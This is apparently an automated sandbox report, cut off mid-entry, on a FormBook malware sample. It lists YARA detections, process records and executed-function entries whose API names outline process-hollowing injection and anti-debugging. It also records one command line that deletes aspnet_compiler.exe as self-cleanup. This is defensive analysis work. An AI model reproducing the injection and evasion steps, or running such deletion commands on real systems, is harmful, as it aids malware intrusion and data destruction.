Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.458109413.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.458109413.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.458109413.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3688, Parent PID: 6272

General

Target ID:	2
Start time:	11:45:05
Start date:	25/05/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff77c400000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.419943976.000000000D55D000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.419943976.000000000D55D000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.419943976.000000000D55D000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.444239022.000000000D55D000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.444239022.000000000D55D000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.444239022.000000000D55D000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmmon32.exePID: 6768, Parent PID: 3688

General

Target ID:	9
Start time:	11:45:40
Start date:	25/05/2022
Path:	C:\Windows\SysWOW64\cmmon32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmmon32.exe
Imagebase:	0xda0000
File size:	36864 bytes
MD5 hash:	2879B30A164B9F7671B5E6B2E9F8DFDA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.637234072.00000000047F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.637234072.00000000047F0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.637234072.00000000047F0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.635249504.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.635249504.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.635249504.00000000046A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.633278640.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6872, Parent PID: 6768

General

Target ID:	12
Start time:	11:45:45
Start date:	25/05/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Imagebase:	0xed0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6820, Parent PID: 6872

General

Target ID:	13
Start time:	11:45:46
Start date:	25/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6406f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: jwRbEDUUZC.exePID: 1548, Parent PID: 2576COMMON

Execution Graph

Execution Coverage:	28.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.1%
Total number of Nodes:	96
Total number of Limit Nodes:	2

Executed Functions

Function 00A132C0 Relevance: 1.6, APIs: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00A1334E

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: fa3bb4ebceafaa784b2be5ce50037fff025312b761d414ffaf73694bdbf9534b
Instruction ID: 20f945ee25508cc38850b564f167617fc322f243b8d6129d7a250b44edc200ee
Opcode Fuzzy Hash: fa3bb4ebceafaa784b2be5ce50037fff025312b761d414ffaf73694bdbf9534b
Instruction Fuzzy Hash: 2B3199B5D012189FCF10CFA9E984ADEFBB1BB49324F14842AE815B7200C775AA45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00A10958 Relevance: .6, Instructions: 568COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7bead87fcbe511d7721a10e06250b69a3848c27203b233c41d6ae0294ce1e3b
Instruction ID: b800575e80afe28f9b61ffb72472056bb3a0f30ba83bbe31f89dc3da7f08f21c
Opcode Fuzzy Hash: e7bead87fcbe511d7721a10e06250b69a3848c27203b233c41d6ae0294ce1e3b
Instruction Fuzzy Hash: 27529474A012188FDB64CF69C984B99BBF1FF49310F1181EAE909A7361D770AD85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00A12078 Relevance: .5, Instructions: 506COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7241f680cfc4b698651107d023ec46aea11f51936ebe14b323bf9c66372d180
Instruction ID: 757ba00987edfb4be140e54d9d717df282a5cc0f8fe7a13e42f593b0ef9a4903
Opcode Fuzzy Hash: d7241f680cfc4b698651107d023ec46aea11f51936ebe14b323bf9c66372d180
Instruction Fuzzy Hash: C132C075A00218DFDB25CF64C984B99BBB2FF49304F1580E9EA09AB261D731EE91DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00A103D7 Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d67a0524f8d40758181dc5d9bfc42aacafc0e7e2bcfb504e2616c5366eb15f20
Instruction ID: 25cbc32d4a29a3a06c2e836d82771815982094fa7e5d2a0b6bdf73e7a0068526
Opcode Fuzzy Hash: d67a0524f8d40758181dc5d9bfc42aacafc0e7e2bcfb504e2616c5366eb15f20
Instruction Fuzzy Hash: B2D17571C083989FCF11DFA8C884BDEBBB1BF0A314F15816AD415AB261DB749989CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00A1520D Relevance: 1.7, APIs: 1, Instructions: 240
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00A153F7

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 26cca2c9aa42d1830d21d2785309a692a88c25c800d1341c36804f05882ba9fe
Instruction ID: cc871415427772651265dd4f60e975284265496b73dcf99b9ae6b7e0cafa644a
Opcode Fuzzy Hash: 26cca2c9aa42d1830d21d2785309a692a88c25c800d1341c36804f05882ba9fe
Instruction Fuzzy Hash: 2181F171C0422DDFCF21CFA4C980BDDBBB1AB59304F1190AAE549B7260D770AA89CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00A15218 Relevance: 1.7, APIs: 1, Instructions: 236
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00A153F7

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: dc8f30924e92bf82ba10e7140adffe4e8d3c090f72b90ef19508a60de5962599
Instruction ID: 3611e6e57c0a169c3dd75798db1164ba5335e2413a86a3e1f09824627589de48
Opcode Fuzzy Hash: dc8f30924e92bf82ba10e7140adffe4e8d3c090f72b90ef19508a60de5962599
Instruction Fuzzy Hash: B781D171C0022DDFCF21CFA4C984BDDBBB1AB59304F1194AAE549B7260D770AA85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00A158F8 Relevance: 1.6, APIs: 1, Instructions: 114
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00A159CE

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b71c85993b78b242f1040144cb92ed55ee7fa71420c5e7c9f0900afc7fa4e3ef
Instruction ID: 889349461bbf5ff38ad3851570ae2114c6101ca7c794afc27ca6a93a76193f04
Opcode Fuzzy Hash: b71c85993b78b242f1040144cb92ed55ee7fa71420c5e7c9f0900afc7fa4e3ef
Instruction Fuzzy Hash: 234187B5D01258DFCB10CFA9D984ADEFBF1BB49310F24902AE818BB210D374AA45CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00A15900 Relevance: 1.6, APIs: 1, Instructions: 110
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00A159CE

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 8f25f2f2cf8268645b1df3bae366b7d65fb68829090b46495ad09c6b76230922
Instruction ID: 24605a4b5a2227845c4e51bad6e0a14bc67a61c50b55407929e26edd8d8cca83
Opcode Fuzzy Hash: 8f25f2f2cf8268645b1df3bae366b7d65fb68829090b46495ad09c6b76230922
Instruction Fuzzy Hash: 984146B5D01258DFCB10CFA9D984ADEFBF1BB49314F24902AE818B7210D375AA45CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00A156D9 Relevance: 1.6, APIs: 1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00A1578D

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 7a91096f8d2bd4669067f3337a5934b9df7d0e4aba5511fe3eddc3e93ab66739
Instruction ID: a3176eedfeb22f2c065c7cac208dfaa53b7eb9c00889fca7f7107300f6252321
Opcode Fuzzy Hash: 7a91096f8d2bd4669067f3337a5934b9df7d0e4aba5511fe3eddc3e93ab66739
Instruction Fuzzy Hash: BE3197B9D00258DFCF10CFA9E984ADEFBB1BB49310F14A42AE814B7210C335A946CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00A156E0 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00A1578D

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: e9943f579fd09b00caaf83f7f9ec0a97c7ad46222e56d4f6e324d96ba352b009
Instruction ID: 4e5c9fe5764e77e1ce36b313d52a9490e3b49ca0274268cb68c148fedfb75af5
Opcode Fuzzy Hash: e9943f579fd09b00caaf83f7f9ec0a97c7ad46222e56d4f6e324d96ba352b009
Instruction Fuzzy Hash: 133196B9D00258DFCF10CFA9D984ADEFBB1BB49310F14A02AE814B7210D335A945CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00A157F0 Relevance: 1.6, APIs: 1, Instructions: 97
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00A1589D

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7fd56383a66ea6a42bd6c2fa671c6b81114a6d83ce15b665d8951a3876770e9c
Instruction ID: 10d6e7e4533b1307fd8cbcd6a52671fae90f891eecd772d6debd1531e059c66f
Opcode Fuzzy Hash: 7fd56383a66ea6a42bd6c2fa671c6b81114a6d83ce15b665d8951a3876770e9c
Instruction Fuzzy Hash: 553175B8D042589FCF10CFA9E984ADEFBB1BB49310F14902AE814BB310D335A9428F65

Uniqueness

Uniqueness Score: -1.00%

Function 00A157F8 Relevance: 1.6, APIs: 1, Instructions: 95
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00A1589D

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bdb1cae184db40c5fdc8a713345cb82900be9d3f3c573dfeb670eeedb10628ca
Instruction ID: 0c9f3d455a41f2459b7a4e274aca3989bb2f98d3ab37723d720efa58b6fb2f5e
Opcode Fuzzy Hash: bdb1cae184db40c5fdc8a713345cb82900be9d3f3c573dfeb670eeedb10628ca
Instruction Fuzzy Hash: FF3164B9D00258DFCF10CFA9E984ADEFBB5BB49310F10A02AE815B7310D335A9458F65

Uniqueness

Uniqueness Score: -1.00%

Function 00A155C9 Relevance: 1.6, APIs: 1, Instructions: 92
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadContext.KERNELBASE(?,?), ref: 00A1567A

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 8b6e76470d36837587ea610f3df1baa7b6aa2e63e2b6ba8be5cef14b04767a94
Instruction ID: 1f0c446677ca73780da6ad6365aa66dd964c4d7135f1b586d0e498a9139c23a4
Opcode Fuzzy Hash: 8b6e76470d36837587ea610f3df1baa7b6aa2e63e2b6ba8be5cef14b04767a94
Instruction Fuzzy Hash: 9E31CBB4D012589FCB10CFA9D984ADEFBF1BB49314F18802AE414B7350C378AA45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A13710 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumWindows.USER32(?,?), ref: 00A137B1

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 1aaa7f85eca491abb967b54ced51d61f483af96a41730206d4c66e06e76c77ba
Instruction ID: 6293046b5353f07d01ac5f17762061009ebf2edd675038a383cd7a138f78883d
Opcode Fuzzy Hash: 1aaa7f85eca491abb967b54ced51d61f483af96a41730206d4c66e06e76c77ba
Instruction Fuzzy Hash: 8631CAB4D052189FCF10CFA9E984AEEFBB1AF49314F14942AE405B7250C774A946CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00A155D0 Relevance: 1.6, APIs: 1, Instructions: 88
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadContext.KERNELBASE(?,?), ref: 00A1567A

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 6ef199b2d279af08366755ea2db85c2b4dfe9280e79a39c3c0c0e9a3566cc97b
Instruction ID: 7ef52d6d05b81ffb8efb1026067be15b7756319360ab5484d56f977d5da30702
Opcode Fuzzy Hash: 6ef199b2d279af08366755ea2db85c2b4dfe9280e79a39c3c0c0e9a3566cc97b
Instruction Fuzzy Hash: 63317AB5D012589FCB10CFA9D984ADEFBF1BB49314F14902AE414B7350D379AA85CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A13718 Relevance: 1.6, APIs: 1, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumWindows.USER32(?,?), ref: 00A137B1

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 74e400280a47f6f75eb8abbc1be64cf8ef243f87cf618e69e830745226fe1c03
Instruction ID: 8fa3ed0c5a041844673521f0ccf304bacbafcc24a854dd98e24855ecd7eca7f9
Opcode Fuzzy Hash: 74e400280a47f6f75eb8abbc1be64cf8ef243f87cf618e69e830745226fe1c03
Instruction Fuzzy Hash: 4431B9B5D052189BDF10CFA9E984AEEFBB1AF49314F10942AE405B7250C774A945CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00A132B8 Relevance: 1.6, APIs: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00A1334E

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 63c3a00421b3c9e0cba931fde3b8ff001612e2f81e6ea50300c31d4e8b6b23a7
Instruction ID: 6711714b22aa634ff2e785c129af7db32813e48b6a07bd02222fdc4176601972
Opcode Fuzzy Hash: 63c3a00421b3c9e0cba931fde3b8ff001612e2f81e6ea50300c31d4e8b6b23a7
Instruction Fuzzy Hash: 2F31B9B5D052189FCF10CFA9E984AEEFBB1BF49314F15842AE815B7200C775AA45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00A13440 Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00A134C6

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 63a8a4afa411672d5738a77bd32ef4850ce10340df64d7f14cdb50c4f2ef95d4
Instruction ID: 440942e3fc49c8ab111741b4a7664ea2cd120db49af2407c5377c367a35fdc5f
Opcode Fuzzy Hash: 63a8a4afa411672d5738a77bd32ef4850ce10340df64d7f14cdb50c4f2ef95d4
Instruction Fuzzy Hash: 2531CAB5D042189FCF10CFA9E984ADEFBF4AB49320F14806AE819B7310C334A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A15AD1 Relevance: 1.6, APIs: 1, Instructions: 71threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 00A15B4E

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 7c656d20454c59800b416351e01463845b71de5b6ec5bdfe7dbb398ace4d7248
Instruction ID: 56aa305f52a508e4d4395bcec3b79fec4d41300c85a38bbf2dfa21ab4c9f718d
Opcode Fuzzy Hash: 7c656d20454c59800b416351e01463845b71de5b6ec5bdfe7dbb398ace4d7248
Instruction Fuzzy Hash: 4821A8B4D042189FCB10CFA9E984ADEFBF4EB49324F14906AE819B7310D375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A10370 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 00A134C6

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: b85361f42b0a82dfa8b4804ea7d470db9cd6ed7f78b6ccb99ecc7804cc846bdb
Instruction ID: dae4339df1bb851960ab70cfedd1c162d09afd22e7162ac7f71368d39b471817
Opcode Fuzzy Hash: b85361f42b0a82dfa8b4804ea7d470db9cd6ed7f78b6ccb99ecc7804cc846bdb
Instruction Fuzzy Hash: 5D31A7B5D00218AFCB10CFA9E584ADEFBF4EB09324F14902AE819B7310D335A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A15AD8 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 00A15B4E

Memory Dump Source

Source File: 00000000.00000002.373114973.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_jwRbEDUUZC.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 07db2292a9ef473a3c38ee0df96ee190e16a011119de11b260e982ee3e5cce4b
Instruction ID: 0696640d51953cb324ba0457ea2d0eaa28b6cd8b626be7f081f33fe1895109c8
Opcode Fuzzy Hash: 07db2292a9ef473a3c38ee0df96ee190e16a011119de11b260e982ee3e5cce4b
Instruction Fuzzy Hash: B22186B8D042189FCB10CFA9E584ADEFBF4AB49324F14902AE819B7310D375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0086D01C Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.373065559.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_86d000_jwRbEDUUZC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05785b8b02296a1addd03f907c60ab5f295ca6e123909227e27f03198cf2b18e
Instruction ID: a926fc69d5ff78ba6ae378f273047c9a1cfce280eae338e2be18eceb45c6d399
Opcode Fuzzy Hash: 05785b8b02296a1addd03f907c60ab5f295ca6e123909227e27f03198cf2b18e
Instruction Fuzzy Hash: F82101B5A08744DFDB10DF24D9C4B26BBA5FB84318F25C969E9098B242C33AD847C662

Uniqueness

Uniqueness Score: -1.00%

Function 0086D017 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.373065559.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_86d000_jwRbEDUUZC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c57d8025b61e571f4b4ad3083314dd915d37462a3eaa0f55d7f4a86799f75029
Instruction ID: 877508e33fb39ca03c8b3695cdfc00f5e1821d20e2b7d33e68d4acf3ae98ab2f
Opcode Fuzzy Hash: c57d8025b61e571f4b4ad3083314dd915d37462a3eaa0f55d7f4a86799f75029
Instruction Fuzzy Hash: 7F119A75A04780CFDB11DF10D6C4B15BBA1FB84314F28C6AAD8498B656C33AD84BCB52

Uniqueness

Uniqueness Score: -1.00%

Function 04890098 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.374354630.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4890000_jwRbEDUUZC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1376d134b25dcf2fc73c52472bcc768b2b0fdad475570c890ae9f7a33e38be00
Instruction ID: 2f474a47181fd287cb85b6fcc8edf52012683a36fdc9106c581cec9b14ca3264
Opcode Fuzzy Hash: 1376d134b25dcf2fc73c52472bcc768b2b0fdad475570c890ae9f7a33e38be00
Instruction Fuzzy Hash: 89E0C274E04208EFCB44DFA8D940A9CBBF0FB88314F2081AAD808A3340D731AA91DB85

Uniqueness

Uniqueness Score: -1.00%

Function 048900F0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.374354630.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4890000_jwRbEDUUZC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 530244a98ddb84f175ca4279fdba408c247d85c4c43a41b99677b9f053e487d2
